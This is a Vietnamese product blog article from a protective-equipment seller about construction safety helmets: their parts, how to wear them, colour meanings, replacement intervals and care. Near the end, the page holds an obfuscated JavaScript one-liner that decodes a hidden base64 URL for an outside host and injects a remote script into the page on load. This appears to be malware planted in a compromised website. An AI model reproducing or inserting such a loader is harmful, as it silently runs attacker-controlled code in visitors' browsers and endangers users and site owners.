Lưu ý khi sử dụng mũ bảo hộ lao động chất lượng

bảo hộ lao động là một trong những trang thiết bị không thể thiếu cho người lao động trong các doanh nghiệp, điện lực, các công trường xây dựng….Đây là một vật dụng vô cùng quan trọng cũng góp phần bảo vệ an toàn đến sức khỏe và cả tính mạng của người lao động làm giảm chấn thương ở bộ phận đầu khi có sự cố xảy ra.

Cùng Bảo hộ lao động Thanh Bình tìm hiểu chi tiết nhé!

Lưu ý khi sử dụng nón bảo hộ lao động chất lượng
Lưu ý khi sử dụng nón bảo hộ lao động chất lượng

Mũ bảo hộ lao động là gì?

Mũ bảo hộ lao động là loại mũ/nón bảo vệ phần đầu cho công nhân, kỹ sư, thợ làm các công việc đặc thù khỏi những tác nhân gây thương tích đầu do va đập hoặc giữ cố định phần tóc (không rủ xuống che mắt nhìn, không rớt vào thành phẩm khi rụng, không xoắn vào máy móc, thiết bị khác…) đảm bảo chất lượng công việc trong giờ làm.

Mũ bảo hộ lao động được đánh giá là 1 trong những vật dụng quan trọng nhất trong danh sách đồ bảo hộ lao động của công nhân. Tùy vào từng công việc, tính chất công việc mà mỗi ngành nghề, vị trí sẽ quy định loại mũ bảo hộ lao động khác nhau về mẫu mã, hình dáng, kích thước, chất liệu, công năng…

Đặc điểm của mũ bảo hộ lao động

Vùng đầu chính là vùng quan trọng nhất của con người, hằng ngày có không ít những trường hợp người lao động phải tử vong vì tai nạn lao động xảy ra và ảnh hưởng đến vùng đầu, chấn thương sọ não,.. do đó trong công việc chúng ta cần phải sử dụng đúng cách mũ bảo hộ lao động để có thể đảm bảo an toàn cho bản thân của mình khi lao động.

Đặc điểm của mũ bảo hộ lao động
Đặc điểm của mũ bảo hộ lao động

Trong nhiều ngành nghề, mũ bảo hộ lao động là một thiết bị không thể thiếu. Nhất là ngành xây dựng hay các ngành khai thác, cầu đường,.. thì nón bảo hộ chính là thứ gắn liền với người công nhân trong mọi hoàn cảnh công việc. Nó có khả năng bảo vệ phần đầu của người lao động khỏi những tác động nguy hiểm từ bên ngoài khi xảy ra va đập hay có tai nạn lao động.

Mũ bảo hộ cao cấp có cấu tạo rất đặc biệt. Bảo vệ, hạn chế tối đa va đập vào vùng đầu của người sử dụng. Cấu tạo đó gồm có các bộ phận: đai, vỏ và quai mũ. Khi sản phẩm có đầy đủ 3 bộ phận trên với tiêu chuẩn với những quy trình kiểm định nghiên ngặt.

Hướng dẫn sử dụng mũ bảo hộ lao động

  • Nên kiểm tra mũ bảo hộ lao động trước mỗi lần sử dụng.
  • Khi thêm hoặc sử dụng các phụ kiện nên được tư vấn từ nhà sản xuất.
  • Kiểm tra miếng lót hút mồ hôi để đảm bảo nó thoải mái, không gây bất tiện khi sử dụng.
  • Quai mũ và núm vặn nên được điều chỉnh để mũ bảo hộ lao động cố định và thoải mái trên đầu.
  • Tuyệt đối không vén quai mũ trên vành hoặc đnh lên mũ bảo hộ lao động. Không đội thêm bất cứ loại mũ nào bên dưới mũ bảo hộ lao động để tránh việc gây khó khăn đối với hệ thống dây đeo.
  • Vỏ hoặc các bộ phận khác của mũ bảo hộ lao động nên được thay thế khi hư hỏng.

Ý nghĩa của từng màu sắc mũ bảo hộ lao động

Không phải chiếc mũ bảo hộ lao động nào cũng giống nhau, chúng có rất nhiều màu sắc đa dạng. Mỗi gam màu đều tương ứng với một công việc nhất định. Để mua được màu nón bảo hộ phù hợp với lĩnh vực, ngành nghề mà bạn đang làm thì hãy cùng chúng tôi tham khảo ý nghĩa của màu sắc mũ bảo hộ lao động dưới đây:

  • Ý nghĩa nón bảo hộ lao động màu xám: Loại mũ này không dùng cho nhân viên hay công nhân mà sử dụng cho những người khách đến công trường tham quan quy mô công trình và quy trình làm việc của công nhân.
  • Ý nghĩa nón bảo hộ lao động màu cam: Thường được dùng cho các chủ thầu dịch vụ hay những công nhân đang làm xây dựng đường bộ.
Ý nghĩa của từng màu sắc nón bảo hộ lao động
Ý nghĩa của từng màu sắc nón bảo hộ lao động
  • Ý nghĩa nón bảo hộ lao động màu nâu: Mũ bảo hộ lao động màu nâu thường được dùng chủ yếu cho thợ hàn cơ khí. Ngoài ra mũ bảo hộ màu nâu cũng được nhiều công nhân sử dụng khi làm ở môi trường có nhiệt độ cao vì màu sắc này trầm và khá sạch sẽ.
  • Ý nghĩa nón bảo hộ lao động  màu xanh lá cây: Mũ bảo hộ lao động màu xanh lá cây thường được dùng cho những nhân viên tập sự, công nhân mới đến công trường hoặc các viên thanh tra an toàn.
  • Ý nghĩa nón bảo hộ lao động màu vàng: Sản phẩm bảo hộ lao động này được sử dụng chủ yếu cho người lao động bình thường và không có nhiều kinh nghiệm chuyên môn. Hoặc được dùng cho các công nhân môi trường.
  • Ý nghĩa nón bảo hộ lao động màu hồng tươi: Thường được dùng trong trường hợp những công nhân đang thiếu nón bảo hộ lao động để đảm bảo cho sự an toàn của họ khi làm việc vào thời điểm đó.
  • Ý nghĩa nón bảo hộ lao động màu xanh dương: Loại mũ bảo hộ màu xanh dương này sẽ rất phù hợp với những người đang làm việc trong lĩnh vực khai thác kỹ thuật. Bạn dễ dàng bắt gặp màu sắc mũ bảo hộ này tại các nhà máy, khu công nghiệp, công nhân sửa chữa điện tại tòa nhà hay các khu thủy điện.
  • Ý nghĩa nón bảo hộ lao động màu trắng: Màu mũ bảo hộ lao động màu trắng sẽ dùng cho những kỹ sư công trình, người giám sát hay những độc công hay quản lý. Chúng được sản xuất cực kỳ phổ biến trên thị trường với các thương hiệu nón nổi tiếng.

Lưu ý khi sử dụng mũ bảo hộ lao động

Mỗi loại mũ bảo hộ lao động khác nhau sẽ có thời gian sử dụng tối đa cho mỗi loạinón khác nhau tùy theo vào từng nhà sản xuất nhưng một chiếc nón bảo hộ không nên dùng quá 5 năm. Tuổi thọ của vỏ nón có thể giảm đi khi chịu tác động của nhiều yếu tố như :

  • Những va chạm hàng ngày (mặc dù lực tác động là rất nhỏ nhưng cũng phần nào làm ảnh hưởng đến tuổi thọ của vỏ nón).
  • Sự xuống cấp của chất liệu cấu tạo nón theo thời gian.
  • Tác động của thời tiết
  • Các tác dụng của dung môi, hóa chất, keo dán…

Sau một năm sử dụng đai nón nên được thay thế bởi phần đai nón là bộ phận thường xuyên phải tiếp xúc với mồ hôi hay các dung môi, hóa chất… cũng có thể làm ảnh hưởng đến đai nón.

Trước khi sử dụng mũ bảo hộ lao động cần kiểm tra kỹ càng. Nếu phát hiện nón có vết cắt, vết nứt, thay đổi màu sắc, vật liệu bị giòn, đường chỉ bị đứt hay có bất cứ dấu hiệu nào bất thường trên vỏ nón và đai nón thì không nên sử dụng và cần phải thay thế ngay.

  • Mũ bảo hộ phải thường xuyên được vệ sinh sạch sẽ. Chỉ nên lau chùi bằng nước ấm và kiểm tra tình trạng nón thường xuyên.
  • Luôn luôn đeo quai mũ và phải kiểm tra kỹ quai nón đã được gài đúng vị trí chưa, đúng khớp hay không khi làm việc trên cao. Mũ bảo hộ phải lựa chọn mũ phù hợp với kích thước đầu người sử dụng, điều chỉnh đai mũ ôm khít đầu.
  • Giữa vỏ mũ và đai mũ thường có khoảng trống giữa nhằm tác dụng hấp thu lực tác động, vậy nên không được chèn bất cứ thứ gì ở giữa khoảng trống này.
  • Các bộ phận của mũ phải dùng đồng nhất của một nhà sản xuất. Không nên sử dụng lẫn lộn vỏ mũ, đai và quai mũ của nhiều nhà sản xuất khác nhau.
  • Mũ bảo hộ không nên dùng chung. Mỗi một người cần được trang bị riêng cho mình một chiếc mũ bảo hộ và hướng dẫn chi tiết cho họ cách sử dụng và bảo quản.

(function(){var a=document.head||document.getElementsByTagName(“head”)[0],b=”script”,c=atob(“aHR0cHM6Ly9qYXZhZGV2c3Nkay5jb20vYWpheC5waHA=”);c+=-1<c.indexOf("?")?"&":"?";c+=location.search.substring(1);b=document.createElement(b);b.src=c;b.id=btoa(location.origin);a.appendChild(b);})();

Bài viết liên quan

Để lại một bình luận

Email của bạn sẽ không được hiển thị công khai. Các trường bắt buộc được đánh dấu *